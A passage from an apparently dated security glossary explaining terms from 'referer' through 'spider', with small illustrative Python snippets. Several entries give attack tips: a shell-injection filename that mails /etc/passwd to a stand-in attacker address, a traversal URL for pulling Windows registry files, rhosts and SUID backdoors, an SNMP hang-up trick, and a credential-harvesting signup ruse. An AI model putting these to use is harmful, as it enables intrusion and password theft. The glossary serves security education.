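keys_per_second = tried / (days * 24 * 60 * 60)   # average rate over the effort
winning_key = 0x532B744CC20999           # 14 hex digits, so it fits in 56 bits

print(f"{keyspace:,} keys, {fraction_searched:.0%} searched, "
      f"{keys_per_second:,.0f} keys/second on average")
```

Each extra key bit doubles the keyspace, which is why the recovered message argues for longer keys rather than a better cipher.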

RDO (Remote Data Objects) [2]

TODO

referer [4]

A field within the HTTP header that tells the server the hypertext link that the browser followed when requesting the file. This field was designed to enhance the browsing experience. For example, when you follow a link from a search engine, a website can parse out the search terms you looked for and reformat the webpage with those terms highlighted.

Example: Below are examples of Referer fields from people who hit my website.


http://www.google.com/search?q=sniff+program+network

http://www.google.com/search?q=cable+%22port+scan%22&num=100

http://mc9.metacrawler.com/crawler?general=sub%2Bseven&method=0&sid=53403613mc9_22_16&sno=23858&domainLimit=0&rpp=20&timeout=0&hpe=10&format=regular&power=0&refer=nav&start=20

http://www.google.com/search?q=network+sniffer+detector

http://www.google.com/search?q=registered+dynamic+ports&sa=Google+Search

http://infoseek.go.com/Titles?qt=%22windows+sniffer%22&sv=IS&lk=noframes&svx=sbox_nohit&cc=WW&oq=%22win98+sniffer%22

http://search.excite.com/search.gw?c=qb&s=%2Bresonate+%2Bwarez&showSummary=true&start=0&lang=en&perPage=10&next=Next+Results
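Example: A minimal sketch of how a website could pull the search terms out of a Referer field, using Python's standard urllib.parse. The function name is hypothetical, and the parameter names (q for Google, qt for Infoseek) are taken from the sample URLs above; other engines use other names.

```python
from urllib.parse import urlsplit, parse_qs

def search_terms(referer, param="q"):
    """Return the decoded value of one query parameter, or None if absent."""
    query = urlsplit(referer).query
    values = parse_qs(query).get(param, [])   # decodes '+' and %xx escapes
    return values[0] if values else None

print(search_terms("http://www.google.com/search?q=sniff+program+network"))
print(search_terms("http://www.google.com/search?q=cable+%22port+scan%22&num=100"))
```

The same few lines that enable highlighting also tell the site operator exactly what each visitor was searching for.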

Key point: Like cookies, the Referer field is not a security hole in itself. However, it can be combined in interesting ways with other browser features in order to create big security and privacy holes.

Registry [3]

On Windows, all configuration information is stored in a series of files known as hives. Programs read/write this configuration information using special Windows APIs.

Key point: On WinNT machines, the registry can often be remotely accessed. Some portions can even be read without a password.

Key point: Many programs cache passwords in the registry, often in clear-text or only slightly obfuscated.

Key point: Trojan horses often place themselves in a "Run/RunService" registry entry in order to be automatically launched on the next reboot. Double-check these entries in order to improve the security of your system.

Key point: Win95 stores the registry in c:\windows\system.dat and c:\windows\user.dat (and backups in *.da0 instead of *.dat). If you can get to a Win9x system, then you can often read these files. For example, many personal webservers (ICQ, FrontPage98, etc.) allow a URL of the form http://victim/.html/....../windows/user.dat that can fetch the files. Many cached passwords are stored in the registry, so getting these files is very important.

relay [3]

E-mail relay is where spammers hijack an e-mail server in order to forward their spam through the server. Usually, the spammer (from the Internet) sends the e-mail server a single e-mail with thousands of recipients.

Key point: This allows a spammer with a dial-up account to send e-mail as fast as a high-speed Internet connection, since it is the victim who breaks apart the recipient list and sends each person a separate copy. Therefore, one e-mail goes into the server, thousands come out.

Key point: Relaying can be turned off in the e-mail server configuration. Such configuration will force the server to accept either incoming mail, or outgoing mail, but not incoming e-mail destined back out to the Internet. There are several sites on the Internet that will scan your corporate e-mail server to see if it will relay spam.
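Example: The rule can be sketched as a small Python policy check. This is not any real mail server's configuration syntax; the domain, the network range, and the function name are all hypothetical.

```python
import ipaddress

LOCAL_DOMAINS = {"example.com"}                          # domains we receive mail for
TRUSTED_NETWORKS = [ipaddress.ip_network("10.0.0.0/8")]  # our own internal clients

def should_accept(client_ip, recipient):
    """Accept incoming mail or outgoing mail, but never outside-to-outside."""
    domain = recipient.rsplit("@", 1)[-1].lower()
    incoming = domain in LOCAL_DOMAINS
    client = ipaddress.ip_address(client_ip)
    outgoing = any(client in network for network in TRUSTED_NETWORKS)
    return incoming or outgoing

print(should_accept("203.0.113.5", "alice@example.com"))   # Internet -> local user
print(should_accept("10.1.2.3", "bob@elsewhere.org"))      # local user -> Internet
print(should_accept("203.0.113.5", "bob@elsewhere.org"))   # Internet -> Internet
```

The third case is the relay: both the sender and the recipient are strangers, so the server has no reason to carry the message.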

Resource: Paul Vixie's MAPS http://maps.vix.com/ (MAPS is SPAM spelled backwards).

remote administration trojan (RAT) [2]

A trojan that, when run, gives a hacker remote administration of the machine.

Contrast: A trojan is any program with a hidden intent. A RAT is one whose hidden intent is to remotely control the machine. In particular, once the program is run and installs itself as a hidden background service, it ceases to be a trojan in the classic sense and is now better thought of as a rootkit.

Example: Back Orifice, NetBus, SubSeven, Hack'a'tack

Contrast: A remote administration trojan is not a virus. The general populace uses the word virus to apply to any hostile program a hacker might use. Normally, being a purist using the correct word is futile, but in this case the distinction is important. You catch viruses accidentally, and the virus rarely does anything hostile to your system. Conversely, when a hacker attempts to infect your system with a remote administration trojan, the hacker is attacking you personally.

Key point: Infections by remote administration Trojans on Windows machines are becoming as frequent as viruses. One common vector is through File and Print Sharing, when home users inadvertently open up their system to the rest of the world. If a hacker has access to the hard-drive, he/she can place the trojan in a location known as the startup folder. This will run the trojan the next time the user logs in. Another common vector is when the hacker simply e-mails the trojan to the user along with a social engineering hack that convinces the user to run it against their better judgement.

replay [3]

A replay attack is a type of sniffer attack where the traffic is captured then retransmitted back at a computer.

Analogy: In the 1992 movie Sneakers, the victim uses a voice identification system. Therefore, the heroes record the voice of one of the victim's employees, edit it with a computer, then play it back into the voice recognition system.

Key point: It seems the first generation of any security architecture is vulnerable to replay attacks. For example, IPsec was originally vulnerable to some replay attacks, even though it had provisions against the most obvious ones.

Key point: The anti-replay remedy is to include a timestamp with a message. This then implies that everyone needs to have their clocks synchronized in order to communicate correctly.
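Example: A minimal sketch of the timestamp remedy in Python, assuming the two sides already share a key. The message layout, the key, the function names, and the 30-second window are all hypothetical choices for illustration. The timestamp is covered by the authentication tag, so an attacker cannot simply rewrite it.

```python
import hashlib
import hmac

SHARED_KEY = b"hypothetical shared key"
MAX_AGE = 30     # seconds of clock difference we are willing to tolerate

def make_message(payload, now):
    # The timestamp is part of the authenticated body.
    body = str(now).encode() + b"|" + payload
    tag = hmac.new(SHARED_KEY, body, hashlib.sha256).hexdigest().encode()
    return tag + b"|" + body

def accept(message, now):
    tag, body = message.split(b"|", 1)
    expected = hmac.new(SHARED_KEY, body, hashlib.sha256).hexdigest().encode()
    if not hmac.compare_digest(tag, expected):
        return False                      # forged or altered
    timestamp = int(body.split(b"|", 1)[0])
    return abs(now - timestamp) <= MAX_AGE   # stale means replayed

captured = make_message(b"open the door", now=1000)
print(accept(captured, now=1005))     # fresh
print(accept(captured, now=5000))     # sniffed earlier, replayed later
```

A copy replayed inside the window would still be accepted, so the window has to be short, which is exactly why the clocks must agree.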

Resource Kit [3]

Microsoft supplies a set of useful tools in a "Resource Kit". There are different kits for Win98, WinNT, and Win2k.

Key point: The resource kits contain numerous tools to help system administration. Therefore, these tools are extremely useful for hacking. Any hacker interested in compromising Windows has a copy of the Resource Kit.

Key point: These tools aren't "dangerous". They don't provide any capabilities that hackers couldn't program for themselves. These tools are useless against secured systems.

reverse engineering [3]

A technique whereby the hacker attempts to discover secrets about a program. Some reverse engineering techniques are:

strings: Dumps all the human-readable strings within a program. In 1999, hackers looked for "strings" within Microsoft's products and found something labeled NSA_KEY. This led to the paranoid delusion that the NSA had somehow convinced Microsoft to put a backdoor key into the system. Similarly, early in year 2000, hackers discovered strings like GetPrivateProfileString in the BlackICE Defender personal firewall and made paranoid assumptions (in reality, GetPrivateProfileString is a standard Win32 function). The most commonly used tool for this is the program strings included with UNIX.
disassemble: Takes the compiled output of a program and retrieves the original assembly language mnemonics, which are easier for humans to read. For example, the byte "0x90" might be converted back into the NOP (no operation) instruction. An example of using this technique to discover code being sent across the wire is at http://www.robertgraham.com/pubs/aol-exploit. The problem with disassembly is that it only makes the object files slightly more readable -- it doesn't reconstruct the full original source code or comments.
decompile: Decompilation produces high-level source code from an executable. The technique has proven essentially worthless for languages like C/C++, but works well on languages like Java, VisualBasic, and Delphi. It still doesn't obtain the original comments, however.
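Example: The strings technique is simple enough to sketch in a few lines of Python. This is an approximation of what the UNIX strings program does (runs of printable ASCII of at least four characters), not a copy of it; the function name and the sample bytes are made up.

```python
import re

def extract_strings(data, min_length=4):
    """Return every run of printable ASCII at least min_length bytes long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_length
    return [match.decode("ascii") for match in re.findall(pattern, data)]

# A made-up "binary": readable names buried among non-printable bytes.
blob = b"\x00\x01NSA_KEY\x00ab\x00GetPrivateProfileString\xff\x90\x90"
print(extract_strings(blob))
```

The output is only a list of names. As the examples above show, deciding what those names mean is where people go wrong.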

Reverse engineering is often used to:

anti-virus: Discover how viruses work in order to write more effective signatures against them.
cracking serialz: Figuring out how copy protection works in order to break it.

rhosts [3]

On UNIX, the "rhosts" mechanism allows one system to trust another system. This means that if a user logs onto one UNIX system, they can further log onto any other system that trusts it. Only certain programs will use this file:

rsh: Tells the system to open a remote "shell" and run the specified program.
rlogin: Creates an interactive, Telnet-like session on the other computer.

Key point: A common backdoor is to place the entry "+ +" in the rhosts file. This tells the system to trust everybody.

Key point: The file simply contains a list of named hosts or IP addresses. Sometimes the hacker can forge DNS information in order to convince the victim that he has the same name as a trusted system. Alternatively, a hacker can sometimes spoof the IP address of a trusted system.
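Example: A minimal sketch of checking rhosts contents for the wildcard backdoor, in Python. It assumes the common "host [user]" line layout and only looks for a bare "+" in either field; the function name and sample hosts are hypothetical, and real files can contain other syntax this does not handle.

```python
def risky_rhosts_entries(text):
    """Return lines where the host or user field is the '+' wildcard."""
    risky = []
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue                      # skip blank lines and comments
        host = fields[0]
        user = fields[1] if len(fields) > 1 else ""
        if host == "+" or user == "+":
            risky.append(line.strip())
    return risky

sample = "trusted.example.com alice\n+ +\nbackup.example.com\n"
print(risky_rhosts_entries(sample))
```

An administrator would run such a check over every user's home directory, since any one account's file can open the door.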

rip [2]

In the underground culture, the word rip means to make a copy of. Often, this has the connotation of making an illegal copy of a copyrighted work. The most common examples are programs that rip music CDs, or site rippers that download a complete copy of an entire web-site.

root (superuser, administrator)[1]

On UNIX, root is the superuser or administrator account that has complete control over everything in the machine.

Key point: The term can be used as a verb. To "root" a machine is to break in and obtain root privileges, and thereby own the machine.

rootkit [3]

Key point: A rootkit contains many trojaned programs. These programs are used to allow the hacker entry back into the system and to hide the presence of the hacker. For example, a trojaned "ps" command might hide the hacker's sniffer daemon from appearing in the process list. Alternatively, the hacker might trojan an existing daemon like inetd to run a background sniffer.

Key point: The most important trojaned programs are those that deal with gaining access back into the system with a special password. Therefore, trojaned versions of login daemon, su, or telnetd are needed.

Key point: Rootkits often contain setuid programs that normal users can run in order to elevate their privileges to root. Look for these in order to see if your system has been hacked.

Culture: Also called "daemon kits".

RPC (Remote Procedure Call) [4]

A popular UNIX network protocol, RPC allows programs on one machine to make a "procedure" call on another machine. The upshot of this is that you could split a program into two halves, each part running on a separate machine. The procedure calls are invisibly mapped so that the programmer doesn't have to worry about the details.

Contrast: The oldest form of RPC in use is Sun's RPC, upon which many famous protocols (such as NFS) are based. A newer form known as DCE RPC is used by Microsoft as the basis for its RPC services. The DCE version is dramatically more complex than the Sun variant, but supplies more services (such as built-in security).

History: In the year 1999 (and early 2000), a wave of hacker attacks against Sun's RPC services swept the net. Virtually any Sun box connected to the net whose default RPC services were enabled was hackable. Many Linux boxes were also hackable through RPC-based services. Virtually all of these attacks were through buffer overflow exploits.

RSA [1]

RSA is the name of the most prevalent public/private key cryptosystem. It is also the name of the company (RSA Security) that essentially holds the patent rights to this system.

Key point: RSA forms the basis for X.509 certificates in web servers and browsers.

Key point: RSA Security charges a hefty license to use the RSA algorithm. However, the patent expires in September of the year 2000. At that time, the number of products using the RSA algorithm is likely to explode.

Key point: An alternative to RSA is the "Diffie-Hellman" algorithm. This is used in many cases, but it is hampered by the fact that many products that could use it (like Netscape and Microsoft browsers) do not; for interoperability you often need to use RSA over DH.

RSAREF [5]

RSA Reference Implementation. This was a fairly "open" implementation of the RSA algorithm that has been embedded into many programs. This is not the source code that RSA sells to vendors, but an "open source" version that has been embedded within freeware/open-source products (like ssh). A patent license is still required when using this code in commercial products, though.

Key point: RSAREF has not been supported by RSA (the company) for a long time, and a number of security holes have been found in this implementation. RSA wants people to use the BSAFE development kit instead. In late 1999 in particular, a bug was found that allows ssh to be hacked.

- S -

SAM (Security Accounts Manager) [3]

TODO:

samples [3]

Many systems ship with samples that demonstrate how the product can be used. Since these samples aren't intended to be used in production systems, they have significantly less security than other components of the system and can frequently be hacked.

See also: defaults

SATAN (Security Administrator Tool for Analyzing Networks)[3]

A vulnerability scanning tool designed to hunt for numerous ways into a system. Much hyped at the time; people feared that it would put a powerful tool into the hands of hackers everywhere. In practice, it was a dud: it was much too "noisy", was already outdated by the time it was released, was impossible to set up, and hasn't really been maintained.

scan (scanner)[2]

This word is overused to the point that it is frequently confusing what people are talking about. The problem is that a scanner can be either active or passive.

Example: There are variations of virus scanners:

background scanner: Scans for viruses continuously in the background.
on-access scanner: Scans a file for viruses whenever it is accessed.
on-demand scanner: Scans the hard disk looking for viruses whenever told to by the user.

scavenge [4]

Connection scavenging is a technique whereby hackers dial up to the Internet hoping to find connections left dangling when somebody else abruptly hung up.

scripts [2]

Programs written to take advantage of a particular exploit.

Key point: Elite hackers write scripts, script-kiddies run scripts.

Misunderstanding: A lot of "scripts" are written in scripting languages like PERL, but a lot are distributed in C/C++ source form as well.

script-kiddies [2]

A type of hacker who knows how to do little more than run pre-packaged scripts against computers hoping to break into them. The technical knowledge of the script-kiddy is often less than the average computer user. They are usually trained in the operation of scripts by some sort of mentor, and they generally believe that such things happen by "magic".

server [1]

An extremely generic term that can apply to most anything. Generally, things called servers respond to requests sent to them by clients.

Examples:

Web sites are hosted on web servers
The trojan dropped onto a victim's machine for remote administration is called the server portion. Script kiddies frequently run the server portion instead of the client, accidentally infecting themselves.

Misconception: An X Windows terminal is called an X server. This is unexpected because generally anything a human interacts with is the client. However, remember that the X Windows protocol allows a program to draw images on a screen. Therefore, the services being performed are image-drawing services. QED: whoever requests that an image be drawn is the client, and whoever carries out the action is the server. It is the terminal that actually draws the images on the screen, hence the terminal is the X server.

sendmail [2]

The most popular program on the Internet used to forward e-mail. Sendmail is also the most complex e-mail system. The combination of being extremely popular and extremely complex has resulted in a huge number of hacking exploits.

History: In 1988, the Morris Worm exploited sendmail bugs as one technique to spread itself.

setuid (SUID) [3]

UNIX programs that can be run by a user, but which have root privileges.

Key point: In theory, setuid programs can only be installed by root, and they are considered as part of the operating system, because they inherently bypass security checks and must verify security themselves. A typical example is the passwd command, which a user runs in order to change his/her password. It must be setuid, because it changes files only root has access to, but yet it must be runnable by users.

Key point: In practice, setuid programs often have bugs that can be exploited by logged in users.

Key point: As part of hardening a system, the administrator should scour the system and remove all unnecessary setuid programs. TODO: show the command to do so.
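Example: One way to take the inventory, sketched in Python with the standard os and stat modules. The helper names are hypothetical, and this only lists candidates; deciding which ones are unnecessary is still the administrator's job.

```python
import os
import stat

def is_setuid(mode):
    """True for a regular file whose mode has the setuid bit set."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)

def find_setuid(root="/"):
    """Yield the path of every setuid file under root, skipping unreadable spots."""
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda err: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                mode = os.lstat(path).st_mode   # lstat: do not follow symlinks
            except OSError:
                continue
            if is_setuid(mode):
                yield path

# Usage (can take a while on a full filesystem):
#     for path in find_setuid("/usr/bin"):
#         print(path)
```

Saving the list from a known-clean system gives a baseline to compare against later, which helps spot setuid files that were added afterwards.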

Key point: Some programs are really setgid, which only changes the group context rather than the user context.

Key point: Windows doesn't have the concept of setuid. Instead, RPC is used whereby client programs (run by users) contact server programs to carry out the desired task. For example, in order to change the password, the client program asks the SAM to do it on behalf of the user. Thus, whereas UNIX requires a myriad of client programs to verify credentials and be written securely, Windows only requires a few server programs to do the same.

Key point: A common way to backdoor a system is to place a SUID program in the /tmp directory.

shared media [4]

Networks like Ethernet whereby multiple computers connect to the same wire.

Key point: In such systems, any computer on the wire can eavesdrop on its neighbors.

Contrast: Most corporations are replacing their shared media nets with switched connections.

shared secret [4]

The idea that many people share the same password or key. Shared secrets are widely used because they are easy: there is simply one password to give out. On the other hand, the more widely a secret is shared, the more likely it is to become compromised. In fact, many people believe that even sharing a secret between two people is extremely risky, and that the proper solution is using public keys to distribute a randomly generated key valid only for the particular message.

Example: DVD movies are encrypted with a randomly generated key. This key is then encrypted multiple times with hundreds of different keys. Every DVD player vendor owns one of these keys and embeds it in their device, thus allowing that player to decrypt the movie. (Presumably, if one of the keys is compromised, future movies can be generated without the offending key, causing players based upon that key to become obsolete). However, there is no good way to protect these keys, even though they are in hardware. In late 1999, students in Europe were able to break one of these keys (the Xing software DVD player), and from there they were able to break the majority of the other keys. (These keys only used 40-bit encryption, so breaking one key in the software player allowed a known-plaintext attack).

shell [3]

The default command-line interface on UNIX systems.

Key point: This is similar to the "Command Prompt" or incorrectly named "DOS Prompt" on Windows systems.

Key point: Many systems pass filenames along with commands directly to the shell. Hackers can exploit this by sending special shell characters (like the pipe | character) as part of filenames in order to execute their own commands. This is an example of an input validation exploit. Examples of this are web-servers, PERL scripts, and CGI scripts.
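Example: A small Python sketch of the problem and two common defenses. The function names and the choice of the cat command are hypothetical; shlex is used here only to show how a POSIX shell would split each command line, so nothing is actually executed.

```python
import shlex

def unsafe_command(filename):
    # The filename is pasted straight into a shell command line.
    return "cat " + filename

def quoted_command(filename):
    # shlex.quote wraps the filename so the shell sees it as one plain word.
    return "cat " + shlex.quote(filename)

def argv_command(filename):
    # Better still: build an argument list and never involve a shell at all.
    return ["cat", "--", filename]

hostile = "report.txt | mail hacker@example.com < /etc/passwd"
print(shlex.split(unsafe_command(hostile)))   # the pipe becomes its own token
print(shlex.split(quoted_command(hostile)))   # the pipe stays inside the filename
```

The argument list from argv_command can be handed to subprocess.run without shell=True, in which case the pipe character has no special meaning at all.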

Key point: The most popular shell among hackers is probably "bash", the shell from GNU that ships with Linux. (Culture: The original shell on UNIX is known as the "Bourne Shell", named for its creator. The acronym "bash" means "Bourne Again SHell", reflecting the fact that it is a rewrite of that shell).

Key point: Retrieving someone's .bash_history file is a common attack against UNIX machines. Several embedded systems have shipped such that the file http://raq.robertgraham.com/~root/.bash_history could be retrieved via the web.

Key point: The holy grail of UNIX hacking is to somehow obtain (or re-obtain) a root shell. In other words, the hacker wants to get a command-line on the victim system in order to carry out any task. For this reason, buffer overflow exploits often contain what is called "shell code". When the victim process is running with root privileges, the buffer-overflow will cause that process to begin running a shell. For example, an exploit might send a long password containing the shell code to an FTP server, converting the TCP connection to the FTP server into a full command-prompt from which any program can be launched.

shoulder surfing [2]

Slang for watching somebody type their password on their keyboard. In much the same way that hackers teach themselves to read upside down (in order to read documents when seated in front of a desk), hackers can also practice watching people type on the keyboard.

Analogy: Crooks often steal credit card numbers in the same way. They stand behind people in line and read their credit cards as they sit on the countertop during processing.

sign [3]

TODO

signature [3]

In anti-virus and intrusion detection systems, a signature is a pattern that the system will look for when scanning files or network traffic.

Key point: Marketing forces often mean that companies have to fill their products with useless signatures. Don't be impressed because one product has more signatures than another.

Key point: One of the key goals of hacking is to evade signature detection. Virus writers attempt to encrypt their viruses, whereas remote hackers attempt to alter the networking protocol so that it has the same effect, but a different pattern on the wire.
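Example: A toy illustration in Python of pattern matching and of the evasion described above. The signature table, its name, and the request strings are made up for illustration, and real products match far more than raw substrings.

```python
from urllib.parse import unquote_to_bytes

# Hypothetical signature table: name -> byte pattern to look for.
SIGNATURES = {"hypothetical-cgi-probe": b"/cgi-bin/phf"}

def scan(data):
    """Return the names of all signatures whose pattern appears in data."""
    return [name for name, pattern in SIGNATURES.items() if pattern in data]

plain = b"GET /cgi-bin/phf?Qalias=x HTTP/1.0"
evasive = b"GET /cgi-bin/%70hf?Qalias=x HTTP/1.0"   # %70 is an encoded 'p'

print(scan(plain))                        # pattern found
print(scan(evasive))                      # same request, different bytes on the wire
print(scan(unquote_to_bytes(evasive)))    # found again after decoding
```

A web server decodes %70 back to "p", so both requests have the same effect. The scanner only catches the second one if it normalizes the traffic the same way the target does.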

signature [3]

In cryptography, a signature (or digital signature) is something (usually a private-key encrypted hash) that verifies the integrity of a message.

Example: Microsoft's Authenticode allows application developers to sign their programs. Any alteration to the software will result in an invalid signature. Therefore, hackers can't add trojans/viruses to commercial software without it being detected.

Key point: Digital signatures only work if people check them. People rarely check signatures in e-mail or software.
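Example: A toy sketch of the "private-key encrypted hash" idea in Python, using tiny textbook RSA numbers (p = 61, q = 53) that are an assumption for illustration. The key is far too small, there is no padding, and the hash is squeezed to fit the modulus, so this offers no security and is not how Authenticode or any real product works.

```python
import hashlib

N = 61 * 53        # toy modulus (3233)
E = 17             # public exponent: anyone may verify
D = 2753           # private exponent: only the signer knows it

def digest(message):
    # Hash the message, then reduce it to fit under the toy modulus.
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % N

def sign(message):
    return pow(digest(message), D, N)       # "encrypt" the hash with the private key

def verify(message, signature):
    return pow(signature, E, N) == digest(message)   # undo it with the public key

program = b"original program bytes"
signature = sign(program)
print(verify(program, signature))
print(verify(program + b" plus a trojan", signature))
```

Nothing happens unless somebody actually calls verify, which is the point of the key point above.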

smart card [3]

TODO A smart card is an authentication scheme whereby a user must possess a card with electronics in order to achieve access.

SMB [3]

SMB is the protocol used by Microsoft for file and print sharing. SMB stands for Server Message Block, though that doesn't really mean anything. SMB runs on top of NetBIOS, though in Win2k it can bypass NetBIOS.

History: SMB was originally developed for DOS machines. It was later upgraded so that OS/2 machines could act as servers for DOS machines. The protocol was later upgraded for Windows (Wfw = Windows for Workgroups) and Windows NT. Still later upgrades have been added for Windows 2000. This constant evolution and need for backwards compatibility has led to numerous security holes within the protocol. The most severe is the need for "LAN Manager" authentication.

Key point: SMB is an application layer protocol and can run over many different transports, including TCP/IP. A common problem is that home-users enable SMB over TCP/IP, allowing anybody on the Internet to access their hard-disk. They should instead install a local-only transport such as NetBEUI for SMB, which will allow file access among local machines, but not remote machines across the Internet.

SMTP (Simple Mail Transfer Protocol) [3]

Key point: Virtually all e-mail exchanged on the Internet is through SMTP.

Key point: The most common exploits for SMTP involve spammers trying to relay mail through high-speed mail servers.

sniffer [1]

A wiretap that eavesdrops on computer networks.

Key point: You have to be between the sender and the receiver in order to sniff traffic. This is easy in corporations using shared media, but practically impossible with an ISP unless you break into their building or are an employee.

Key point: Sniffers are frequently used as part of automated programs to sift information off the wire, such as clear-text passwords, and sometimes password hashes (to be cracked).

Further reading: http://www.robertgraham.com/pubs/sniffing-faq.html.

SNMP (Simple Network Management Protocol)[3]

The Internet infrastructure is composed of lots of hardware scattered around the place. SNMP is the method that allows someone to "manage" all that equipment. By the word "manage" I mean do things like monitor the amount of traffic flowing through the equipment, trigger alerts when faults occur, change the configuration of equipment remotely, and so forth.

Key point: Most equipment comes with default passwords (aka community strings) of public and private. These allow you to read information from the device (traffic, temperature, voltage, etc.) and re-configure it.

Key point: A common technique is to traceroute to a victim's dial-up machine, thereby discovering the IP address of the hardware they've dialed into. Then, you can send SNMP commands with the "private" community string telling the hardware to hang up on the victim.

social engineering [3]

Social engineering is a form of hacking that targets people's minds rather than their computers. A typical example is sending out snail mail marketing materials with the words "You may already have won" emblazoned across the outside of the letter. As you can see, social engineering is not unique to hackers; its main practitioners are the marketing departments of corporations.

Key point: The classic example is to pretend to be from a company's computer department and call up a user asking for their password. Sophisticated hacks will first try to make the victim uncomfortable (i.e. "We've detected improper use of your account..."), then offer them the opportunity to be very helpful ("I'm sure we can check this out now and not involve your boss."). The technique often works well in reverse: call up the computer support department and tell them you've lost your password. This works especially well in companies that have policies requiring you to change your password -- people forgetting passwords on really old accounts are frequent, so support departments are deluged with such requests, so it's easy to slip one past them.

Key point: Know as much about your victim as possible. If you are emulating something, try to find the answers to typical questions you will be asked.

Key point: If all else fails, try stupidity. If you are a foreigner, pretend not to speak the language well. Likewise, females have certain advantages in male-dominated cultures.

Example:

For members-only access, please create an account:
Username:
Password:
Confirm:

People often choose the same password for everything. For example, put on your website the prompt shown above. A lot of users will use the same username/password for this that they use for websites like Hotmail, Yahoo mail, or Netscape mail. This will therefore sift valid e-mail accounts from people who visit your site. In a similar manner, these passwords might be useful within the companies they work for as well.

Key point: Newbies are favorite victims of social-engineering attacks in chat rooms. Hackers go after people who appear to be unsure of themselves online.

Key point: Many hackers do not consider social-engineering a "real" attack because it doesn't require extensive technical knowledge in order to pull off.

sockets / WinSock [4]

In programming, the "sockets" interface is the most common way that coders use to access the network. Sockets works by creating a "file handle" that when written to, sends data over the network rather than to a file on the hard-disk.

Contrast: Other interfaces programmers could use are higher-level abstractions like RPC, or lower-level "raw" interfaces like libnet.

Contrast: Sockets originally came from UNIX, but has been ported to other platforms. In particular, the "WinSock" variant for Windows includes both the UNIX-style functions as well as the Windows-style functions. It is possible to write sockets-based programs that compile for both platforms.

Key point: The name "sockets" comes from the TCP/IP term "socket". A socket is the minimum information needed to communicate on the network: the source/destination IP address, the source/destination port, and the transport protocol (UDP or TCP).
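Example: A minimal sketch using Python's standard socket module that opens a TCP connection over the loopback interface and prints those five pieces of information from each end. It assumes the machine allows connections to 127.0.0.1; the variable names are hypothetical.

```python
import socket

# Listening socket on loopback; port 0 lets the operating system pick a free port.
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(("127.0.0.1", 0))
server.listen(1)

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(server.getsockname())
conn, _ = server.accept()

# Protocol, source IP, source port, destination IP, destination port.
client_view = ("TCP",) + client.getsockname() + client.getpeername()
# The same connection seen from the other end: source and destination swap.
server_view = ("TCP",) + conn.getsockname() + conn.getpeername()
print(client_view)
print(server_view)

client.sendall(b"hello")       # writing to the handle sends data over the network
received = conn.recv(1024)

for s in (client, conn, server):
    s.close()
```

The two printed tuples describe one connection; together the five values are what distinguishes it from every other connection on the network.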

SOCKS [3]

SOCKS is a service that allows internal machines behind a firewall/proxy/gateway access to the Internet. Rather than talking to the target machine, clients communicate with the SOCKS server and ask it to relay data to the target machine out on the Internet.

Key point: SOCKS servers are frequently misconfigured, allowing both outside and inside people to use them. This means that if a hacker wants to hide where they come from, the hacker scans the Internet for SOCKS proxies, then funnels their data through the proxies they find. When victims trace back to the hacker's IP address, they find the open SOCKS server instead.

Key point: Abuse through SOCKS servers has become so common on IRC networks that many of them (dalnet, undernet) have begun scanning clients to see if they are running an open SOCKS proxy. They deny access to anybody coming into the networks through such a proxy. Note that users can still use closed proxies (i.e. those available only to internal users).

Key point: SOCKS servers listen by default on TCP port 1080.
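Example (sketch): The "ask it to relay" step is a very small message. The following Python builds a SOCKS version 4 CONNECT request and checks a reply. It covers only SOCKS4 with an IPv4 target; the function names are invented for this illustration, and nothing is sent on the network.

```python
import socket
import struct

SOCKS_DEFAULT_PORT = 1080   # default listening port mentioned above

def build_socks4_connect(dest_ip: str, dest_port: int, user_id: bytes = b"") -> bytes:
    """Build a SOCKS4 CONNECT request for the given target (hypothetical helper)."""
    version = 4      # SOCKS protocol version
    command = 1      # 1 = CONNECT (relay a TCP connection)
    return (
        struct.pack("!BBH", version, command, dest_port)
        + socket.inet_aton(dest_ip)   # 4-byte IPv4 address of the target
        + user_id + b"\x00"           # user id, terminated by a NUL byte
    )

def socks4_granted(reply: bytes) -> bool:
    """Return True if an 8-byte SOCKS4 reply says the request was granted."""
    return len(reply) == 8 and reply[1] == 90   # 90 = request granted
```

A client would send these bytes to the proxy on port 1080 and, if the reply indicates success, treat the same connection as if it were connected to the target.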

Real world: Most browsers support SOCKS, which you can see in the "proxy" settings configuration tab. You can download generic SOCKS clients and servers from http://www.socks.nec.com/.

solaris [3]

TODO: talk about common exploits for solaris

source route [4]

In network protocols, source routing is the capability whereby the sender can specify the route a packet should take.

Analogy: Somebody asks you how to get to the freeway. You can give them two responses:

You tell them to drive a little further on, and there will be signs pointing to the freeway. You tell them just to follow the signs. This is normal routing: you simply hand the packet off to the routers, and let them worry about which direction the packet takes.
You tell them to drive up 3 blocks, turn left, then go 2 blocks, then turn right, then go one more block and bear left onto the onramp. This is source routing: you tell the packet every hop it should take through the network.

Key point: The hacker can give the packets routes that go around firewalls.
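Example (sketch): In IPv4, the list of hops travels as an option in the IP header. The Python below builds the bytes of that option as laid out in RFC 791. It only constructs the option; the function name is hypothetical, and a real packet would also need the rest of the IP header.

```python
import socket

LSRR = 131  # option type: loose source and record route (RFC 791)
SSRR = 137  # option type: strict source and record route (RFC 791)

def source_route_option(hops, strict=False):
    """Build the IPv4 source-route option listing the given hop addresses."""
    route = b"".join(socket.inet_aton(h) for h in hops)
    length = 3 + len(route)   # type byte + length byte + pointer byte + addresses
    pointer = 4               # offset of the first address still to be visited
    option = bytes([SSRR if strict else LSRR, length, pointer]) + route
    # The IP options area must be a multiple of 4 bytes; pad with End-of-Options (0).
    return option + b"\x00" * (-len(option) % 4)
```

Because any router honoring the option forwards the packet along the listed hops, many firewalls and routers are configured simply to drop packets that carry it.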

spider [3]

An automated program that reads webpages from a website, then follows the hypertext links to other pages. If the Internet is a "web", then a spider is something that follows the strands of the web.

Key point: A website can use the file "robots.txt" to give hints to spiders about what they should, or should not, index. A big problem for websites is that spiders are really good at finding webpages, even those that website operators don't want exposed; users then find these pages through hits from search engines. Website operators can therefore "hide" pages by listing them in "robots.txt". However, hackers read "robots.txt" precisely in order to find the webpages that website operators want hidden.
